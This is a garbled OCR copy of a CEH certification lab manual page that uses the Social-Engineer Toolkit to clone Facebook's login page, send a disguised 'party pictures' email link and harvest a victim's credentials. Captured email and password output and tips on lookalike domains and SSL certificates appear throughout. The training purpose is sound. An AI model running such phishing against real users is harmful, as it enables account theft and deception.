{ - ] SET supports both HTTP and HTTPS
I - ] Example: h ttp ://w w w .th is is a fa k e s ite .c o m I
s e t:w ebattack> Enter the u r l to clo n e:www.facebook.com
b ■ ‫—ך‬ .
[* ] Cloning the w ebsite: h ttp s ://lo g in .fa c e b o o k .c o m /lo g in .p h p
[ * j This could take a l i t t l e b i t . . . 1 I J
fokc -‫י‬ ,
POSTs on a w ebsite.
Trie b e » « v Ttoaie fteu ■tfm.k iJ 11
fie ld s are a v a ila b le . Regardless, K h i
[ ! ] I have read the above message.
to continuePress <retu ri
FIGURE 3.9: SET Website Cloning
12. Leave the Credential H arvester A ttack to fetch inform ation from the
victim ’s m achine.
C Q t 11e web jacking attack
method will create a
website clone and present
the victim with a link
stating that the website has
moved. This is a new
feature to version 0.7.
1333If you’re doing a
penetration test, register a
name that’s similar to the
victim, for Gmail you could
do gmail.com (notice the
1), something similar diat
can mistake the user into
thinking it’s die legitimate

* Term inal
[ - ] C re d e n tia l h arve ste r w il l allo w you to u t il i z e the clone c a p a b ilitie s w ith in
SET
[ - ] to harvest c re d e n tia ls or parameters from a w ebsite as w e ll as place them in
to a report — —
[■] This option is used fo r what IP the s e rv e r w il l POST to . _ * a * * '
[ - ] I f y o u 're using an e x te rn a l IP , use your e x te rn a l IP fo r th is
s e t:w ebattack> IP address fo r the POST back in H a r v e s te r /T a b n a b b in g :l# ^ ^ ^ ^ ^
[ - ] SET supports both HTTP and HTTPS
[-1 Example: h ttp ://w w w .th is is a fa k e s ite .c o m
s e t:w ebattack> Enter the u r l to clo n e:www.facebook.com
[* ] Cloning the w ebsite: h ttp s ://lo g in .fa c e b o o k .c o m /lo g in .p h p
[*j This could take a l i t t l e b i t . . .
password torm
POSTs A a webs
sername and
ftp tu re s al
The beat way to use th is a tta c k i » i f
fie ld s f t r g ava ila b le . R e jr d le s s . ■ h i
I ' l l have read the above message.
Press to continue
‫׳‬ ] S o cial-E n g in ee r T o o lk it C re d e n tia l H arvester A ttack
, j C re d e n tia l H arvester is running on po rt 80
■] In fo rm atio n w il l be displayed to you as i t a rriv e s below:
FIGURE 3.10: SET Credential Harvester Attack
13. N ow , you have to send the IP address o f your BackTrack m achine to a
victim and trick him or her to click to browse the IP address.
14. For tins dem o, launch your w eb brow ser 111 the BackTrack m achine;
launch your favorite email service. 111 this exam ple we have used
www.gm ail.com . Login to your gmail account and com pose an email.
FIGURE 3.11: Composing email in Gmail
1e email w here you w ish to place the
icon.
C O
15. Place the cursor 111 the body o f t
lake URL. T hen, click the Link
m When you hover over
the link, die URL will be
presented with the real
URL, not the attacker’s
machine. So for example if
you’re cloning gmail.com,
the URL when hovered
over it would be gmail.com.
When die user clicks the
moved link, Gmail opens
and then is quickly replaced
with your malicious
Webserver. Remember you
can change the timing of
the webjacking attack in die
config/set_config flags.
0 =5!Most of die time they
won’t even notice the IP
but it’s just another way to
ensure it goes on without a
hitch. Now that the victim
enters the username and
password in die fields, you
will notice that we can
intercept the credentials
now.

‫א‬ C om po se Mail —« ‫־‬ 9) • >flma1l.com * C m ail • M ozilla F iretox
Ejle Edit yiew History flookmarks Ipols Help
T C | 121▼ Google Q,S' ‫ן‬ ^ fi http‫״‬ google.com/nîl,
|Ba:kTrack Lnux l i * nsiwe Security |lE x p lo it‫־‬DB Âircrack-ng J^SomaFM
Gmail Documents Calendar More •
0 + Share
o
G 0 v ‫׳‬g le
Discard Lab«h‫־‬» Draft autosaveti at 10:4a AM (0 minutes ago)
° - j@yahoo.com, I
AddCc Add Bcc
Subject @TOIF - Party Pictures
Attach ano
‫־‬ b I y T ‫־‬ rT * A ‫־ד‬‫־‬ • © |o o |i= }= •5 is ‫י‬ ‫י‬ * * ^ I*« Plain Toxt chock spoiling■‫״‬
Hoilo Sam.
PI»4m»click this link lo view tt>*♦w»#»kt»11d (vtrty pictures at TGIF wflh thwcmMxMim*
Regards.
m.
Inbox
SUrrwJ
Important
Sert Mail
Drafts (2)
►Circles
Search chat or SU'
‫«י‬9
FIGURE 3.12: Linking Fake URL to Actual URL
16. 111 the Edit Link w indow , first type the actual address in the Web
address field under the Link to option and then type the fake U RL 111
the Text to display held. 111 tins exam ple, the w eb address we have
used is http://10.0.0.15 and text to display is
www.facebook.com/Rini TGIF. Click OK
g)gm ail.com - C m ail • M ozilla F iretox)‫ן‬.■•■■»■<«■■‫־‬C om pose Mail‫א‬‫׳־י‬
tile Edit yiew History flookmarks !pols Help
▼© I f l r Google Q.
Compose Mail *
‫״‬5!3 ■ ra p ‫־‬ • googie.com
(BackTrack Lnuxensiwe Security ||F x p lo it‫־‬DB Âircrack-ng j ^ r>omaFM
IM C
»Rlni Search Images Maps Play YouTube
G o . ) g I e
Draft eutosaved at 10:45 AM (0 minutes ago)
Edit Link
X
Toxt to aiepiay: Lw (vfacehook coaVRinl TGIf J Q
Ur* to. To what URL should this link go?
0 Web address |wtp0.0.15 10‫׳/־‬ |Q
C Email **♦‫י•־‬‫י‬ T*‫>״‬l this in*
Not sure wrhatlo pul IntheboxT r m fhdt**■imgeanthe t*obfar youwanrloInk to (A
acarcAcnaincnvotitbe useful.) Then coo rtc acbaddNsa fromme box h your browser's
acMrosoQor and potto it140tno boxaoov•
| OK | Cared
Inbox
Starred
Important
Sent Ma!
Drafts (2)
Circles
JunkE-mal
FIGURE 3.13: Edit Link window
17. T he fake U RL should appear 111 the em ail body, as show n 111 the
following screenshot.

‫א‬ Compose Mail ‫־‬ »—............. • (g>gma1l.com * Cmail • Mozilla Firefox
Ejle Edit History flookmarks Ipols Help
|Ba:kTrack Linux |*|Offensive Security |[JjExploit-DB ^Aircrack-ng jgjjSomaFM
Saved Discard Labels•»‫־‬ Draft autnsaved at 11:01 AM (0 minutes ago) ‫־‬0
To @yahoo com, B
Add Cc Add Bcc
Subjed (QTGIF - Party Pictures
Attach a 10‫ת‬
Sf ‫־‬ B I U T - »T - A, • T - © oo | - IE 3 is H « =3 ^ , piain roxt chock spoiling■'
hello Sam.
P1-*m» click this Ilfikj ivivwU:»|>r11* t:<m1.Rlnl TfilFjlo vlt‫״‬w Ih* <1parly picturws at TGIF wilh lh» celatarttlM
Koqaroe.
G 0 v ‫׳‬g le
Inbox
SUrred
Important
Sert Mail
Drafts (2)
►Circles
Search1
9*
c a The Credential
Harvester Method will
utilize web cloning of a
website that has a username
and password field and
harvest all die information
posted to the website.
FIGURE 3.14: Adding Fake URL in the email content
18. T o verity that the fake U RL is linked to the actual URL, click the fake
U RL and it w ill display the actual U RL as Go to link: w ith the actual
URL. Send the email to the intended user.
rg | |>|t r.ocinle Q, (g
x Compose Mail - • • -• ipgmm l.com - Gmail • M ozilla Firefox•‫־‬
File Edit yie* History gookmarks !0015 Help
M Compose Mail -
V 5r' oogle.com
+ Share [ ‫]־‬
0 •
QBdikTtackUnu* OffensiveSecurity |lExploit-DB KAircrack-ng |£SomdFM
G o u g le
ages Maps Play YouTube
Discard Labels» Draft autosaved at 11:01 AM (0 minutes ago)
@yahoo.c
Add Cc Add Bcc
Sucjecl @TGIF- Party Pictures
Attach a no
‫מ‬ ■ B I U T • tT * A ‫־‬ T • © M jE IE •= 1 ‫׳‬ M E = 1 / x « Plain Text Check Spelling-
Please click this link wwv.facebQ0k.CQm<Rini TGIF to view the weekend party pictures at TGIF with the celebrities
rcpgjrcfc |Go to link. Mlp:f/10.0.0.1y - Chanoe Remove y |
Inbox
Starred
Important
Sert Ms
Drafts (2)
Circles
JunkE-mal
FIGURE 3.15: Actual URL linked to Fake URL
19. W hen the victim clicks the URL, he or she will be presented w ith a
replica o f Facebook.com
20. T he victim w ill be enticed to enter 111s or her user nam e and passw ord
into the form fields as it appears to be a genuine website. W hen the
victim enters the Username and Password and clicks Log In, it does
no t allow logging in; instead, it redirects to the legitimate Facebook
login page. O bserve the U RL in the browser.
m In some cases when
you’re performing an
advanced social-engineer
attack you may want to
register a domain and buy
an SSL cert that makes die
attack more believable. You
can incorporate SSL based
attacks with SET. You will
need to turn the
WEBATTACK_SSL to
ON. If you want to use
self-signed certificates you
can as well however there
will be an “untrusted”
warning when a victim goes
to your website
C EH Lab M anual Page 698 Ethical H acking and Countermeasures Copyright © by EC-Council

f a c e b o o k
Sign Up Connect and share with the people in your Ife.
Tarpbook 1ogin
(mart or t*hon*:
Password: ---------
| 1Keepmelowed in
or Siga up for tacetoook
Forgotyour osss*vord?
!kwo fflOj®Oge =33and Rrtugjes (=t)‫־‬fcngist
F3Lcb5x S 2012 Moble ‫־‬FindFriends ‫־‬Eodces People ‫־‬Poqcs Afccut Crca* cr Ad Create a Page ‫־‬Developers Careers ‫־‬Privacy Coatses Terre
m
Q lo g 1n|h>c«book
1 <‫־‬ H C S|hnp3:;;www.face&oolccom/10gin.php| 1
| ^ Do you want Google Chrome to save your password? | Saver password Never for this site •<
f a c e b o o k
Skjn Up CuarMH.1 and slur** wltli Ilu* ptMipk* 111your lit*.
Facebook Login
Emai or Phone; |
Password:
□ Keepmeloggedm
c» Sum up for r«c^book
forgot rout D»s*crcP
Cnglab (US] VMI 4n-JI Ov/u &Aj<BD£« [x a 'd Pwtuoje* OwO r‫־‬arKab (France)
FaeaboofcZ2012 *r‫־‬Cask** • l«r‫׳‬4ar Ad Craaca a P«g* -L'«/*cp«rc -Lar**rc -!*rvacy‫׳‬1*Batigcc -■«pl« -Hg*c -/•tout j‫׳‬hindS-n*ndc‫׳‬*ModI
m
FIGURE 3.16: Fake and Legitimate Facebook login page
21. As soon the victim types 111 the email address and passw ord, the SET
Terminal 111 BackTrack fetches the typed user nam e and passw ord,
w hich can be used by an attacker to gam unauthorized access to the
victim ’s account.
m Hie multi-attack
vector allows you to turn
on and off different vectors
and combine the attacks all
into one specific webpage.
So when the user clicks the
link he will be targeted by
each of the attack vectors
you specify. One tiling to
note with the attack vector
is you can’t utilize
Tabnabbing, Cred
Harvester, or Web Jacking
with the Man Left in the
Middle attack.
m The multi attack
vector utilises each
combination of attacks and
allows the user to choose
the method for the attack.
Once you select one of the
attacks, it will be added to
your attack profile to be
used to stage the attack
vector. When you’re
finished be sure to select
the I ’m finished' option.

* ‫׳י‬ * Terminal
[* ] S o cial-E n g in ee r T o o lk it C re d e n tia l Harvester‫־‬ Attack.
[ * j C re d e n tia l H arvester is running on po rt 80
[ * j In fo rm atio n w il l be displayed to you as i * ‫י‬--‫י‬~ ‫י‬‫ץ‬ ‫״‬ h r l" “ ‫־‬ —
1 0 .0 .6 .2 - - [26/Sep/2012 11:10:41] “GET / H T TP /1.1“ 200 -
[ * ] WE GOT A HIT! P rin tin g the output:
PARAH: lsd=AVqgmkGh
PARAH: retu rn session=0
PARAH: legacy re tu rn = l
PARAM: d is p la y ‫־‬
PARAH: session key only=0
PARAH: trynu!n=l
§ = t c s f e l 2 | r f I
lo«.n=Log+In
HIT CONTROL-C TO GENERATE A REPORT.
charset te s t= € , ‫׳‬fl,€
tim ezone=-330
lgnrnd=224034 ArY/U
p o s s ib K
PARAH: d e fa u lt persistent=‫־‬Q
POSSIBLE USERNAHE FIELD FOUND:
[» ) WHEN YOU'RE FINISHED,
PARAH
PARAH
PARAH
PARAH
0OSSI
FIGURE 3.17: SET found Username and Password
22. Press CTRL+C to generate a report to r tins attack perform ed.
/v v x Terminal
PARAH: lsd=AVqgmkGh
PARAH: retu rn session=0
PARAM: legacy re tu rn = l
PARAM: d is p la y ‫־‬
PARAM: session key only=0
PARAH: try n u 1»=l
PARAH: charset t e s t = € , / K ,fl,€
PARAH: tiraezone=-540
PARAH: Ignrnd=224034 ArYA
PARAH: lgnjs=n
POSSIBLE USERNAHE FIELD FOUND: emai l ‫׳‬—‫־‬ '•
POSSIBLE PASSWORD FIELD FOUND: pass=test
PARAH: d e fa u lt p e rs is te n t= 0
POSSIBLE USERNAHE FIELD FOUND: l 0gin=L0g+In
[* ] WHEN YOU'RE FIN IS H E D -H IT C0N1R0L-C TO
L . I x
'C [* ] f t l e exported to r J w k ts /2 0 f t -0 9 -f t 15::49:15.S 4 ft l5 .lf» L fo r your
R a s n M r w l W I V W l W A V f I X -‫ך‬
[ • ] F ile in XHL form at exported t ( | re p o rts /2 0 1 2 -0 9 -2 6 1 5 :4 9 :1 5 .5 4 6 4 l^ .x
jr reading p le a s u re ...
C TO GENERATE A REPOftf.
* S / 2 0 K - 0 9 - 2 6 1
HIE**
to continuePress < re tu r1
FIGURE 3.18: Generating Reports duough SET
Lab Analysis
m Social Engineer
Toolkit Mass E-Mailer
There are two options on
the mass e-mailer; the first
would be to send an email
to one individual person.
The second option will
allow you to import a list
and send it to as many
people as you want widiin
that list.
m The multi-attack will
add a combination of
attacks through the web
attack menu. For example
you can utilize die Java
Applet, Metasploit
Browser, Credential
Harvester/Tabnabbing,
and the Man Left in the
Middle attack all at once to
see which is successful.
Analyze and docum ent die results related to die lab exercise.

PARAM : lsd=AVqgmkG11
PARAM : return_session= 0
PARAM : legacy_return = 1
PARAM : displays
PARAM : session_key_only=0
Social
E n g in e e rin g
T o o lk it
PARAM : trynum = 1
PARAM : charset_test=€,',€,',
PARAM : tim ezone=-540
PARAM : lgnrnd= 224034_A rY A
PARAM : lgnjs=n
em ail=sam choang@ yahoo.com
pass=test@ 123
Questions
1. Evaluate each o f the following Paros proxy options:
a. Trap Request
b. Trap Response
c. Continue button
d. D rop button
In te rn e t C o n n e c tio n R e q u ire d
0 Y es □ N o
0 C lassro o m □ !Labs

Ceh v8 labs module 09 social engineering

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Ceh v8 labs module 09 social engineering

Similar to Ceh v8 labs module 09 social engineering (20)

Recently uploaded

Recently uploaded (20)

Ceh v8 labs module 09 social engineering